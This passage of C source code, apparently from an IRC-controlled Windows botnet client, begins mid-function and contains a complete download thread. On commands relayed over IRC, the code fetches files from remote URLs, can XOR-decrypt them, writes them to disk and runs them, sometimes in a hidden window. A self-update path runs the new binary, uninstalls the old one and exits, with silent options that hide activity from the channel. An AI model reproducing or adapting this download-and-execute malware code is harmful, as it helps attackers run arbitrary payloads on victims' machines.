((total%86400)%3600)/60; DWORD seconds = ((total%86400)%3600)%60; if (hours>0) { sprintf(ttime," %d%s",hours,(hours==1?" hour":" hours")); strcat(stime,ttime); } sprintf(ttime," %.2d:%.2d",minutes,seconds); strcat(stime,ttime); irc->pmsg(dl.target,"%s Process Finished: \"%s\", Total Running Time: %s.",download_title,dlto,stime); } if (pi.hProcess) CloseHandle(pi.hProcess); if (pi.hThread) CloseHandle(pi.hThread); } // download is an update } else if (dl.bdata1) { PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; ZeroMemory(&pinfo, sizeof(PROCESS_INFORMATION)); ZeroMemory(&sinfo, sizeof(STARTUPINFO)); sinfo.cb = sizeof(sinfo); sinfo.wShowWindow = SW_HIDE; if (CreateProcess(NULL, dlto, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS|DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE) { uninstall(TRUE,(dl.idata1==1?TRUE:FALSE)); irc->quit(str_quit_upd); Sleep(FLOOD_DELAY); irc->disconnect(); fWSACleanup(); ExitProcess(EXIT_SUCCESS); } else { if (!dl.silent) irc->pmsg(dl.target,"%s Update failed: Error executing file: %s.",update_title,dlto); } } } else { if (!dl.silent) irc->pmsg(dl.target,"%s Bad URL or DNS Error, error: <%d>",(dl.bdata1?update_title:download_title),GetLastError()); } clearthread(dl.threadnum); ExitThread(0); return 0; }
// function for downloading files/updating DWORD WINAPI DownloadThread(LPVOID param) { char buffer[IRCLINE]; DWORD r, d, start, total, speed; DOWNLOAD dl = *((DOWNLOAD *)param); DOWNLOAD *dls = (DOWNLOAD *)param; dls->gotinfo = true; HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0); if (fh != NULL) { // open the file HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); // make sure that our file handle is valid if (f < (HANDLE)1) { sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest); if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice); addlog(buffer); clearthread(dl.threadnum); ExitThread(EXIT_FAILURE); } total = 0; start = GetTickCount(); char *fileTotBuff=(char *)malloc(512000); //FIX ME: Only checks first 500 kb do { memset(buffer, 0, sizeof(buffer)); fInternetReadFile(fh, buffer, sizeof(buffer), &r); if (dl.encrypted) Xorbuff(buffer,r); WriteFile(f, buffer, r, &d, NULL); if ((total) < 512000) { //We have free bytes... //512000-total unsigned int bytestocopy; bytestocopy=512000-total; if (bytestocopy>r) bytestocopy=r; memcpy(&fileTotBuff[total],buffer,bytestocopy); } total+=r; if (dl.filelen) if (total>dl.filelen) break; //er, we have a problem... filesize is too big. if (dl.update != 1) sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: File download: %s (%dKB transferred).", dl.url, total / 1024); else sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: Update: %s (%dKB transferred).", dl.url, total / 1024); } while (r > 0); bool goodfile=true; if (dl.filelen) { if (total!=dl.filelen) { goodfile=false; sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen); irc_privmsg(dl.sock,dl.chan,buffer,dl.notice); addlog(buffer); } } speed = total / (((GetTickCount() - start) / 1000) + 1); CloseHandle(f); /* if (dl.expectedcrc) { unsigned long crc,crclength; sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total); crclength=total; if (crclength>512000) crclength=512000; crc=crc32(fileTotBuff,crclength); if (crc!=dl.expectedcrc) { goodfile=false; irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice); } } */ free(fileTotBuff); if (dl.expectedcrc) { unsigned long crc=crc32f(dl.dest); if (crc!=dl.expectedcrc) { goodfile=false; sprintf(buffer,"[DOWNLOAD]: CRC Failed (%d != %d).", crc, dl.expectedcrc); irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); } } if (goodfile==false) goto badfile; //download isn't an update if (dl.update != 1) { sprintf(buffer, "[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); if (dl.run == 1) { CreateProc(dl.dest,NULL,SW_SHOW); if (!dl.silent) { sprintf(buffer,"[DOWNLOAD]: Opened: %s.",dl.dest); irc_privmsg(dl.sock,dl.chan,buffer,dl.notice); addlog(buffer); } } // download is an update } else { sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.", total / 1024.0, dl.dest, speed / 1024.0); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); if (CreateProc(dl.dest,NULL,SW_HIDE) != 0) { fWSACleanup(); uninstall(); ExitProcess(EXIT_SUCCESS); } else { sprintf(buffer,"[DOWNLOAD]: Update failed: Error executing file: %s.",dl.dest); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); } } } else { sprintf(buffer,"[DOWNLOAD]: Bad URL, or DNS Error: %s.",dl.url); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); } badfile: fInternetCloseHandle(fh); clearthread(dl.threadnum); ExitThread(EXIT_SUCCESS); }